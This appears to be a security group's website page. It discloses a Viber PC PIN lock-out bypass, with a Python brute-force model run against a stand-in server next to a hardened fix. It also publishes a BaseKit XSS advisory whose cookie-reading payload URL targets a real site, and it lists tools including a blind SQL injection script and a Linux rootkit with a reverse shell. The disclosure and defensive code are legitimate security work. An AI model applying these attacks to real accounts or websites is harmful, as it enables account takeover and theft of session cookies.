Spy to Viber users (authentication bug) [solved]

Edited: I informed Viber on 26/06/2013 and they fixed the bug in less than 12 hours.

A few days ago I thought of analyzing some mobile instant messaging applications to see whether they had security bugs. Initially I intended to look at the PC versions of Line and Viber, and I started with the latter.

Analyzing the authentication process of Viber's PC application, I found several security flaws that together allow an attacker to obtain the PIN that grants access to a Viber account from a computer, with everything that implies: spying on conversations in real time (images included), reading the call history, impersonating the user and accessing the address book. All this with the victim noticing practically nothing: they only receive, once, a Viber message on their mobile containing a PIN.

Roughly, the authentication process is as follows:

Install the Viber application for PC. When you run it, it asks whether you have a mobile (any platform) with Viber installed. Say yes and it asks for the mobile number; enter it and Viber sends a message to the mobile Viber app with a 4-digit PIN, which you type into the PC application, and Viber is then authenticated on your computer. The first error is obvious: a 4-digit PIN is wholly inadequate from a security standpoint.

Internally, after you enter your mobile number on the PC (first step), the application generates a (pseudo)random 40-character string that is used from then on as the key identifying your Viber account. This UDID is generated by the program itself, without consulting the server, and is then sent in the following HTTPS request:

<RegisterUserRequest>
    <PhoneNumber>660100200</PhoneNumber>
    <PushToken></PushToken>
    <CountryIDDCode>34</CountryIDDCode>
    <UDID>27b828c2768a7d7b65cg7dced6icb2aa90420c29</UDID>
    <DeviceType>Desktop</DeviceType>
    <SystemVersion>NT6.1</SystemVersion>
    <System>Windows</System>
    <ViberVersion>3.0.1</ViberVersion>
    <SecondaryDevice>1</SecondaryDevice>
</RegisterUserRequest>

If you intercept the UDID (on your own computer, since the client generates it), you can then test PINs against the server for that UDID until you hit the one that was delivered to the victim's mobile Viber app. Each time the PC application tries to validate a PIN it makes an HTTPS request like the following:

<ActivateUserRequest>
    <UDID>27b828c2768a7d7b65cg7dced6icb2aa90420c29</UDID>
    <ActivationCode>1234</ActivationCode>
    <ProtocolVersion>14</ProtocolVersion>
    <System>Windows</System>
</ActivateUserRequest>

It reuses the UDID and tries to validate the PIN 1234. Viber's server has a protection: after 3 wrong PINs the UDID is blocked. The problem is that this can be bypassed. Probably because the backend uses a MySQL database and stores the UDID in a column of type VARCHAR (or another non-binary type), the comparison does not distinguish a UDID with blank spaces appended at the end, nor a change of letter case. With this little trick you can therefore send many more attempts than 3.

The UDID that the server accepts has a maximum length, so you cannot add spaces indefinitely. But given that the server allows 3 attempts per UDID, you can add enough trailing blanks (over 300 are accepted) and also vary the case of the letters: covering all 9000 PINs needs 3000 distinct UDID variants, and as long as the UDID contains at least 8 letters (2^8 = 256 case variants per padding length) you get far more than that. In my tests the generated UDID always had more than 8 letters.

I wrote a small program that tests every PIN from 1000 to 9999; it takes just under 2 hours to try them all. Once the right PIN is found and the server has returned the account key, you have to intercept the request that Viber for PC makes and rewrite the response with a proxy such as Burp Suite (the PIN itself is no longer valid, since it was consumed when the program validated it). After that you have full access to the Viber account from your computer.

It should be noted that Viber on PC will not retrieve messages or call history from before that moment, but it will sync everything from then on.
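The lock-out bypass described above, as an added example that is not the author's program: the real Viber server and PC client are replaced by an in-memory stand-in so the logic runs offline. The model reproduces the post's hypothesis (activation lookup compares the UDID leniently, MySQL non-binary VARCHAR style, while the 3-attempt counter is keyed on the exact string sent) next to a hardened variant that keys the counter on the account. The sample UDID is the one shown in the requests; the 340-character limit and the "first 8 letters" choice are assumptions taken from the figures the post gives.

```python
"""Constructed model of the Viber activation lock-out bypass (added example)."""
import itertools
import secrets

MAX_ATTEMPTS = 3              # lock-out threshold stated in the post
MAX_PAD = 300                 # the post says over 300 trailing blanks are accepted
MAX_UDID_LEN = 40 + MAX_PAD   # assumed server limit; the post gives no exact figure
CASE_LETTERS = 8              # the post: 8 letters suffice, so only flip the first 8


def udid_variants(udid, max_pad=MAX_PAD, case_letters=CASE_LETTERS):
    """Yield distinct strings a lenient comparison treats as equal to `udid`.

    For each padding length 0..max_pad, every upper/lower-case pattern of the
    first `case_letters` letters is produced: (max_pad + 1) * 2**case_letters
    variants, far more than the 3000 needed for 9000 PINs at 3 tries each.
    """
    letter_pos = [i for i, c in enumerate(udid) if c.isalpha()][:case_letters]
    for pad in range(max_pad + 1):
        for mask in itertools.product((False, True), repeat=len(letter_pos)):
            chars = list(udid)
            for upper, pos in zip(mask, letter_pos):
                chars[pos] = chars[pos].upper() if upper else chars[pos].lower()
            yield "".join(chars) + " " * pad


class ActivationServer:
    """Stand-in for the ActivateUserRequest endpoint (constructed, not Viber's).

    lenient=True  : the flaw as the post infers it (lookup lenient, counter per
                    raw string).
    lenient=False : counter keyed on the account the UDID resolves to, so every
                    variant shares one budget of MAX_ATTEMPTS.  Storing the UDID
                    with a binary collation would close the hole as well.
    """

    def __init__(self, lenient):
        self.lenient = lenient
        self.pins = {}        # canonical UDID -> PIN sent to the phone
        self.attempts = {}    # counter key -> failed attempts
        self.requests = 0

    @staticmethod
    def canonical(udid):
        # What a PAD SPACE, case-insensitive collation effectively compares.
        return udid.rstrip(" ").lower()

    def register(self, udid, pin=None):
        pin = pin or f"{secrets.randbelow(9000) + 1000:04d}"
        self.pins[self.canonical(udid)] = pin
        return pin

    def activate(self, udid, code):
        self.requests += 1
        if len(udid) > MAX_UDID_LEN:
            return "rejected"
        account = self.canonical(udid)
        if account not in self.pins:
            return "unknown"
        counter_key = udid if self.lenient else account
        if self.attempts.get(counter_key, 0) >= MAX_ATTEMPTS:
            return "blocked"
        if code == self.pins[account]:
            return "ok"
        self.attempts[counter_key] = self.attempts.get(counter_key, 0) + 1
        return "wrong"


def brute_force_pin(server, udid):
    """Walk PINs 1000..9999, moving to a fresh UDID variant every 3 misses."""
    candidates = (f"{p:04d}" for p in range(1000, 10000))
    pin = next(candidates)
    for variant in udid_variants(udid):
        for _ in range(MAX_ATTEMPTS):
            reply = server.activate(variant, pin)
            if reply == "ok":
                return pin
            if reply != "wrong":
                break                       # this variant is spent; try the next
            pin = next(candidates, None)
            if pin is None:
                return None                 # every PIN tried without success
    return None


if __name__ == "__main__":
    udid = "27b828c2768a7d7b65cg7dced6icb2aa90420c29"   # the post's sample UDID
    for lenient in (True, False):
        server = ActivationServer(lenient)
        real_pin = server.register(udid)
        found = brute_force_pin(server, udid)
        print(f"lenient={lenient}: real PIN {real_pin}, found {found}, "
              f"{server.requests} requests")
```

Against the lenient server the search always finishes, because each variant spends its three tries and the next one starts with a fresh counter; against the hardened server the first variant exhausts the account's budget and every later variant is answered with "blocked". The fix that matters is where the counter is keyed, not how long the UDID may be.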

BaseKit XSS bug advisory

I contacted BaseKit.com 45 days ago to warn them about an XSS (Cross Site Scripting) bug in their systems. They told me it would be fixed within 15 days, but 45 days have passed and the bug still exists, so I have decided to publish it.

BaseKit.com sells a service for creating websites easily with a visual editor. Their website advertises that 228,000 web pages have been built with their system.

Their system uses a URL rewrite module, so a request never reaches a 404 error. Every request path is injected into the page source as follows:

<link rel="stylesheet" type="text/css" href="http://DOMAIN.COM/PATH?startcss=true" />

PATH is not filtered in any way, so you can put HTML in the URL and it is copied verbatim into the page source.

For example, with a URL as:

http://DOMAIN.COM/"><script>alert(document.cookie);</script>

It will be copied as:

<link rel="stylesheet" type="text/css" href="http://DOMAIN.COM/"><script>alert(document.cookie);</script>?startcss=true" />

So you can execute JavaScript in the context of the site.

On BaseKit.com you can see example pages built with their system; you can verify the bug on a real website with the following link:

http://www.instalcesped.com/"><script>alert(document.cookie);</script>
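The reflection pattern from this advisory beside a hardened rendering, as an added example in Python that is not BaseKit's code: the vulnerable function reproduces the page source shown above, the hardened one percent-encodes the path for the URL context and then attribute-escapes the whole URL for the HTML context, and a small check tells whether the href attribute survives intact. The domain, payload and template are taken from the advisory; the function names are mine.

```python
"""Added example: reflected path in a <link href> attribute, vulnerable vs hardened."""
import html
import re
from urllib.parse import quote

# The probe used in the advisory, constructed here as test input.
PAYLOAD = '"><script>alert(document.cookie);</script>'
TEMPLATE = '<link rel="stylesheet" type="text/css" href="{url}" />'


def render_link_vulnerable(domain, path):
    """Reproduces the flaw: the raw request path is pasted straight into href."""
    return TEMPLATE.format(url=f"http://{domain}/{path}?startcss=true")


def render_link_hardened(domain, path):
    """One encoding per context the value passes through.

    quote() percent-encodes everything but unreserved characters and '/', so
    the double quote and angle brackets of the payload become %22, %3C, %3E;
    html.escape() then protects the attribute itself.  Either step alone stops
    this payload; both are applied because the value lives in both contexts.
    """
    url = f"http://{domain}/{quote(path, safe='/')}?startcss=true"
    return TEMPLATE.format(url=html.escape(url, quote=True))


def href_is_intact(markup):
    """True when the first href attribute still ends with the template's own
    '?startcss=true', i.e. user input did not close the attribute early."""
    m = re.search(r'href="([^"]*)"', markup)
    return m is not None and m.group(1).endswith("?startcss=true")


if __name__ == "__main__":
    for render in (render_link_vulnerable, render_link_hardened):
        out = render("DOMAIN.COM", PAYLOAD)
        print(f"{render.__name__}: intact={href_is_intact(out)}\n  {out}")
```

The check is deliberately crude (it only looks at the first href), but it is enough to turn the advisory's manual observation into something a test suite can assert on every deploy.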

Paper about exploiting web vulns

Pepelux has written a paper about exploiting web vulnerabilities to gain access to the underlying system.

There are many vulnerabilities that allow us to exploit a website, all of them old and documented: LFI, RFI, SQL injection, XSS, SSI, ICH and other attacks. For that reason this paper focuses only on the attacks that give access to the system and allow commands to be executed remotely.

Download (English) | Descargar (Castellano)

BlindSQL v1.0

Pepelux has written a bash script to perform blind SQL injection attacks against databases, usually MySQL. It brute-forces configuration data, tables, fields and the data itself from the DB. It uses the lynx browser.

Download

[eNYeSec] Monitor v1.0

Pepelux has written a Windows utility that captures all traffic from the network card, like a sniffer (promiscuous mode). It is configurable with filters and captures the TCP, UDP, ICMP and ARP protocols. It can export data and has a plain-text login detection mode (ftp, pop3, etc.). It is multilanguage (English + Spanish).

Download | See screenshot

Playing with sockets (port scan)

Pepelux has written a paper about low-level port scanning. It explains anonymous port scanning by manipulating packet headers with raw sockets, and shows the most used scan techniques (xmas, fin, etc.) through its own raw socket code and examples. It also explains a little about OS detection.

Download (English) | Descargar (Castellano)

eNYeLKM v1.1

LKM rootkit for Linux x86 with the 2.6 kernel. It inserts jumps inside the system_call and sysenter_entry handlers, so it modifies neither sys_call_table nor the IDT contents. It hides files, directories and processes, hides chunks inside files, gives remote reverse-shell access, local root, etc.

Download LKM

English web version

You are reading the English version of the enye-sec.org web :).

We will try to translate into English everything we make (papers, programs, exploits, etc.). We have already translated some programs and exploits, which you can find on the English version of the site. We will try to translate the old papers too, and in future we will (try to) translate everything.

Our English (especially mine :-S) is not very good, sorry about that.

eNYe Sec | Computer Security